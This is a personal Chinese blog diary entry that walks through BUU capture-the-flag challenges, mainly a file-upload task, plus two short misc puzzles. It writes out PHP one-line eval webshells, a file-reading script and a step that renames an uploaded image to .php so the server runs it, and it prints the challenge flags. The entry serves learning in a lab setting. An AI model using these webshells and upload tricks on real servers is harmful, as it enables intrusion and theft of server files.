22.1.12

又是新的一天,感冒稍微好了点

希望今天的状态可以不错。

还在学一些别的东西。

typora收费了,咱用的是最后一个免费版,主要是正版属实有点小贵。

BUU UPLOAD COURSE 1

打开网页是一个文件上传的系统。

试一试一句话木马

<?php @eval($_GET["cmd"]); ?>

显示文件已储存在: uploads/61de2ea9af7ad.jpg

试一试

http://091478d9-fcbd-4c2d-bda0-ec5a37ef84eb.node4.buuoj.cn:81/index.php?file=uploads/61de2ea9af7ad.jpg

似乎没有显示

试试能不能蚂蚁剑连入。

在蚂蚁剑代码解压出错的时候,我又试了试这个

<?php
  echo "owo";
  ?>

有输出。owo

另外吐槽一下winrar的解压机制,每次都要从C盘复制回来是什么鬼啊。

呃,蚂蚁剑好像有点问题,等待的时候去玩玩misc

蚂蚁剑总算能用了。

中文名真的是个恐怖的东西。

竟然显示返回数据为空。

那就试试手动构建
<?php @eval("ls"); ?>

好像eval被禁用了。

但是问题不大,发现php文件是可以被执行的。于是,直接用php枚举文件。

检查目录:/tmp
/tmp/flag.sh
/tmp/html/index.php
/tmp/html/upload.php

发现了flag
尝试获得文件。

用phpcat进行cat文件。
#!/bin/bash echo $FLAG >> /flag export FLAG=not_flag FLAG=not_flag rm -f /flag.sh

真的是..
那就继续搜
/tmp/html/index.php 没有什么值钱的东西
/tmp/html/upload.php 也没有什么值钱的东西

那就试试/flag 
flag{55ff3ec8-67fe-4b64-be71-e1ef8556f3aa}
真的服了,猜中了。

问题就在这,开始的暴力枚举的脚本遇到没权限的会报错,但是我也没写try所以有问题。

但为什么evel不能用呢?

phpcat.php
<?php
$the_file_path = "/tmp/flag.sh" ;
$fp = fopen ( $the_file_path , "r" );
$str = fread ( $fp , filesize ( $the_file_path ));
echo $str;
?>

吼住

  1. 网上说好像.jpg 蚂蚁剑不能直接执行,那么是不是可以用php把代码重名为.php呢?
  2. 说干就干!
  3. 第3个小标

    <?php
    //uploads/61de3a0442c88.jpg
    
    echo "try:";
    echo rename("uploads/61de3a0442c88.jpg","uploads/e.php");
    ?>
    
        
    得到:    
    try:1
  4. 第4个小标

    //用之前的脚本
    ./uploads/61de380d1be04.jpg
    ./uploads/61de3828bcf26.jpg
    ./uploads/61de382bed83e.jpg
    ./uploads/61de3831f1d58.jpg
    ./uploads/61de387f9098f.jpg
    ./uploads/61de3a4fed328.jpg
    ./uploads/e.php
    ./uploads/61de3ac10a928.jpg
        
    那么是不是成功了呢?
        
    <?php @eval(system($_POST["owo"]));?>
        
  5. 还是显示连接失败,但是访问/uploads/ee.php

    已经显示有空白页面,而且不是nginx的

    我觉得是服务器禁止了eval

  6. 结束:看别人的博客看到了一个挺不错的软件,叫POSTMAN

N种方法解决

  1. 下载下来是个exe
  2. 发现好像没法直接运行。没法zip打开。
  3. linux下file KEY.exe: ASCII text, with very long lines, with no line terminators
  4. 看样子是个图片,扫描显示KEY{dca57f966e4e4e31fd5b15417da63269}

qr

  1. ......
  2. 欢迎参加本次比赛,密码为 Flag{878865ce73370a4ce607d21ca01b5e59}
  3. .....
最后修改:2022 年 01 月 12 日
如果觉得我的文章对你有用,请随意赞赏